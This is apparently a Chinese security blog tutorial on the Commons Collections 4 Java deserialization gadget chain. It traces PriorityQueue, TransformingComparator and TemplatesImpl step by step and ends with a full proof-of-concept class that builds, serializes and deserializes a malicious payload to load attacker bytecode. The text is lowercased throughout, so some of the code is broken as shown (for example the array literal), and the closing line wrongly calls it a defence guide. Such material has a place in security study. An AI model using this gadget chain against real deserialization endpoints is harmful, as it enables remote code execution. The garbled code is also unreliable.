引子cc4简单来说就是cc3前半部分和cc2后半部分拼接组成的，对于其利用的限制条件与cc2一致，一样需要在commons-collections-4.0版本使用，原因是transformingcomparator类在3.1-3.2.1版本中还没有实现serializable接口，无法被反序列化。
priorityqueuepriorityqueue是一个优先队列，作用是用来排序，重点在于每次排序都要触发传入的比较器comparator的compare()方法 在cc2中，此类用于调用priorityqueue重写的readobject来作为触发入口
priorityqueue中的readobject间接调用了compare() 而compare()最终调用了transform()
readobject()方法private void readobject(java.io.objectinputstream s) throws java.io.ioexception, classnotfoundexception { // read in size, and any hidden stuff s.defaultreadobject(); // read in (and discard) array length s.readint(); queue = new object[size]; // read in all elements. for (int i = 0; i < size; i++) queue[i] = s.readobject(); // elements are guaranteed to be in "proper order", but the // spec has never explained what that might be. heapify();}
重写了该方法并在最后调用了heapify()方法，我们跟进一下：
private void heapify() { for (int i = (size >>> 1) - 1; i >= 0; i--) siftdown(i, (e) queue[i]);}

这里的话需要长度等于2才能进入for循环，我们要怎样改变长度呢。
这里用到的是该类的add方法，将指定的元素插入此优先级队列。
heapify()调用了siftdown()方法继续跟进：
private void siftdown(int k, e x) { if (comparator != null) siftdownusingcomparator(k, x); else siftdowncomparable(k, x);}
可以看到判断条件
if (comparator != null)
调用了
siftdownusingcomparator(k, x);
在siftdownusingcomparator()又调用了 comparator.compare()。
transformingcomparator可以看到该类在cc3的版本中不能反序列化，在cc4的版本中便可以了。
transformingcomparator是一个修饰器，和cc1中的chainedtransformer类似。
transformingcomparator里面存在compare方法，当我们调用时就会调用传入transformer对象的transform方法具体实现是this.transformer在传入chainedtransformer后，会调用chainedtransformer#transform反射链。
问题1.就像刚才heapify里面所说的
private void heapify() { for (int i = (size >>> 1) - 1; i >= 0; i--) siftdown(i, (e) queue[i]);}

我们要进入循环要修改值，通过add方法。
priorityqueue.add(1);priorityqueue.add(2);
2.initialcapacity的值要大于1
3.comparator != null
4.通过反射来修改值防止在反序列化前调用，就如之前的链一样，我们到利用时再用反射修改参数。
类似这个样子：
class c=transformingcomparator.getclass(); field transformfield=c.getdeclaredfield("transformer"); transformfield.setaccessible(true); transformfield.set(transformingcomparator,chainedtransformer);
我们先放置个反序列化前不会执行这条链的随便一个参数：
transformingcomparator transformingcomparator=new transformingcomparator<>(new constanttransformer<>(1));
pocpackage ysoserial;import com.sun.org.apache.xalan.internal.xsltc.trax.templatesimpl;import com.sun.org.apache.xalan.internal.xsltc.trax.transformerfactoryimpl;import javassist.convert.transformwritefield;import org.apache.commons.collections4.transformer;import org.apache.commons.collections4.comparators.transformingcomparator;import org.apache.commons.collections4.functors.chainedtransformer;import org.apache.commons.collections4.functors.constanttransformer;import org.apache.commons.collections4.functors.instantiatetransformer;import org.apache.commons.collections4.functors.invokertransformer;import org.apache.commons.collections4.map.lazymap;import org.apache.xalan.xsltc.trax.traxfilter;import javax.xml.crypto.dsig.transform;import javax.xml.transform.templates;import java.io.*;import java.lang.reflect.*;import java.nio.file.files;import java.nio.file.paths;import java.util.hashmap;import java.util.map;import java.util.priorityqueue;public class cc4 { public static void main(string[] args) throws exception { templatesimpl templates=new templatesimpl(); class tc=templates.getclass(); field namefield=tc.getdeclaredfield("_name"); namefield.setaccessible(true); namefield.set(templates,"xino"); field bytecodesfield=tc.getdeclaredfield("_bytecodes"); bytecodesfield.setaccessible(true); byte[] code = files.readallbytes(paths.get("d://tmp/test.class")); byte[][] codes=[code]; bytecodesfield.set(templates,codes); field tfactoryfield=tc.getdeclaredfield("_tfactory"); tfactoryfield.setaccessible(true); tfactoryfield.set(templates,new transformerfactoryimpl()); instantiatetransformer instantiatetransformer=new instantiatetransformer(new class[]{templates.class},new object[]{templates}); // transformer[] transformers=new transformer[]{ new constanttransformer(traxfilter.class), instantiatetransformer }; chainedtransformer chainedtransformer=new chainedtransformer(transformers); transformingcomparator transformingcomparator=new transformingcomparator<>(new constanttransformer<>(1)); priorityqueue priorityqueue=new priorityqueue<>(transformingcomparator); priorityqueue.add(1); priorityqueue.add(2); class c=transformingcomparator.getclass(); field transformfield=c.getdeclaredfield("transformer"); transformfield.setaccessible(true); transformfield.set(transformingcomparator,chainedtransformer); serialize(priorityqueue); unserialize("ser.bin"); } public static void serialize(object obj) throws exception{ objectoutputstream oss=new objectoutputstream(new fileoutputstream("ser.bin")); oss.writeobject(obj); } public static void unserialize(object obj) throws exception{ objectinputstream oss=new objectinputstream(new fileinputstream("ser.bin")); oss.readobject(); }}
以上就是如何实施java安全中的commonscollections4防范漏洞？的详细内容。